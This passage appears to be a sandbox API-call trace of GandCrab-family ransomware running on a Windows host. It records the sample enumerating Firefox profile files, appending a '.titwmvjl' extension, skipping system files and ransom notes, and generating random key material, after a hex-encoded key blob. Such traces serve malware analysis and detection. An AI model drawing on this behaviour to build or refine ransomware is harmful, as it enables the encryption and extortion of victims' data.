9\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0084.904] WriteFile (in: hFile=0x2f0, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259d8ac, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259d8ac*=0x2162, lpOverlapped=0x0) returned 1 [0084.905] CloseHandle (hObject=0x2f0) returned 1 [0084.905] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.906] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.906] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1e, wMilliseconds=0xd6)) [0084.906] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.906] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0084.906] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0084.906] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\d2ca4a09d2ca4deb61a.lock") returned 180 [0084.906] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2f0 [0084.907] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.907] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.907] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\") returned 156 [0084.907] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\*" [0084.907] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\*", fInfoLevelId=0x1, lpFindFileData=0x259d8c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259d8c8) returned 0x503638 [0084.907] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.907] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259d8c8 | out: lpFindFileData=0x259d8c8) returned 1 [0084.909] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.909] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.909] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259d8c8 | out: lpFindFileData=0x259d8c8) returned 1 [0084.909] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0084.909] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0084.909] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\d2ca4a09d2ca4deb61a.lock" [0084.909] lstrlenW (lpString=".titwmvjl") returned 9 [0084.909] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\d2ca4a09d2ca4deb61a.lock") returned 180 [0084.909] VirtualAlloc (lpAddress=0x0, dwSize=0x1a8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.909] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 189 [0084.909] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\d2ca4a09d2ca4deb61a.lock") returned 180 [0084.909] lstrlenW (lpString=".lock") returned 5 [0084.909] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.909] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0084.910] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.910] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.910] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259d8c8 | out: lpFindFileData=0x259d8c8) returned 1 [0084.910] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0084.910] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0084.910] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\TITWMVJL-DECRYPT.txt" [0084.910] lstrlenW (lpString=".titwmvjl") returned 9 [0084.910] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\TITWMVJL-DECRYPT.txt") returned 176 [0084.910] VirtualAlloc (lpAddress=0x0, dwSize=0x1a0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.910] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 185 [0084.910] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\TITWMVJL-DECRYPT.txt") returned 176 [0084.910] lstrlenW (lpString=".txt") returned 4 [0084.910] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.911] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0084.911] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0084.911] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.911] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\TITWMVJL-DECRYPT.txt") returned 176 [0084.911] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\TITWMVJL-DECRYPT.txt") returned 176 [0084.911] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0084.911] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0084.911] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0084.911] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0084.911] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0084.911] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0084.911] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0084.911] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0084.911] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.911] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259d8c8 | out: lpFindFileData=0x259d8c8) returned 0 [0084.911] FindClose (in: hFindFile=0x503638 | out: hFindFile=0x503638) returned 1 [0084.911] CloseHandle (hObject=0x2f0) returned 1 [0084.912] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259db5c | out: lpFindFileData=0x259db5c) returned 1 [0084.912] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0084.912] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0084.912] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\TITWMVJL-DECRYPT.txt" [0084.912] lstrlenW (lpString=".titwmvjl") returned 9 [0084.912] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\TITWMVJL-DECRYPT.txt") returned 167 [0084.912] VirtualAlloc (lpAddress=0x0, dwSize=0x18e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.912] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 176 [0084.912] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\TITWMVJL-DECRYPT.txt") returned 167 [0084.912] lstrlenW (lpString=".txt") returned 4 [0084.912] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.912] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0084.912] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0084.912] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.913] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\TITWMVJL-DECRYPT.txt") returned 167 [0084.913] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\TITWMVJL-DECRYPT.txt") returned 167 [0084.913] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0084.913] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0084.913] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0084.913] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0084.913] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0084.913] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0084.913] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0084.913] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0084.913] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.913] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259db5c | out: lpFindFileData=0x259db5c) returned 0 [0084.913] FindClose (in: hFindFile=0x5037b8 | out: hFindFile=0x5037b8) returned 1 [0084.914] CloseHandle (hObject=0x2e8) returned 1 [0084.914] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259ddf0 | out: lpFindFileData=0x259ddf0) returned 1 [0084.914] lstrcmpW (lpString1="818200132aebmoouht.sqlite", lpString2=".") returned 1 [0084.914] lstrcmpW (lpString1="818200132aebmoouht.sqlite", lpString2="..") returned 1 [0084.914] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\", lpString2="818200132aebmoouht.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" [0084.914] lstrlenW (lpString=".titwmvjl") returned 9 [0084.914] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 147 [0084.914] VirtualAlloc (lpAddress=0x0, dwSize=0x166, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.914] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.titwmvjl") returned 156 [0084.915] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 147 [0084.915] lstrlenW (lpString=".sqlite") returned 7 [0084.915] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.915] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".sqlite ") returned 8 [0084.915] lstrcmpiW (lpString1=".sqlite", lpString2=".titwmvjl") returned -1 [0084.915] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.915] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 147 [0084.915] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 147 [0084.915] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="desktop.ini") returned -1 [0084.915] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="autorun.inf") returned -1 [0084.915] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="ntuser.dat") returned -1 [0084.915] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="iconcache.db") returned -1 [0084.915] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="bootsect.bak") returned -1 [0084.915] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="boot.ini") returned -1 [0084.915] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="ntuser.dat.log") returned -1 [0084.915] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="thumbs.db") returned -1 [0084.915] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0084.915] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0084.915] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="KRAB-DECRYPT.html") returned -1 [0084.915] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="CRAB-DECRYPT.html") returned -1 [0084.915] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="KRAB-DECRYPT.txt") returned -1 [0084.915] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="CRAB-DECRYPT.txt") returned -1 [0084.915] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="ntldr") returned -1 [0084.915] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="NTDETECT.COM") returned -1 [0084.915] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="Bootfont.bin") returned -1 [0084.915] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 147 [0084.915] lstrlenW (lpString=".sqlite") returned 7 [0084.916] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.916] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".sqlite ") returned 8 [0084.916] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.916] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.916] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2e8 [0084.917] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.917] ReadFile (in: hFile=0x2e8, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dd3c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259dd3c*=0x21c, lpOverlapped=0x0) returned 1 [0084.917] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.918] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.918] CryptAcquireContextW (in: phProv=0x259dc6c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259dc6c*=0x4c9980) returned 1 [0084.919] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0084.920] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.920] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.920] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259dcf8 | out: pbBuffer=0x259dcf8) returned 1 [0084.920] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.920] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0084.920] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.920] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0084.920] CryptAcquireContextW (in: phProv=0x259dc6c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259dc6c*=0x4c9980) returned 1 [0084.922] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0084.922] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0084.922] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0084.922] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259dd18 | out: 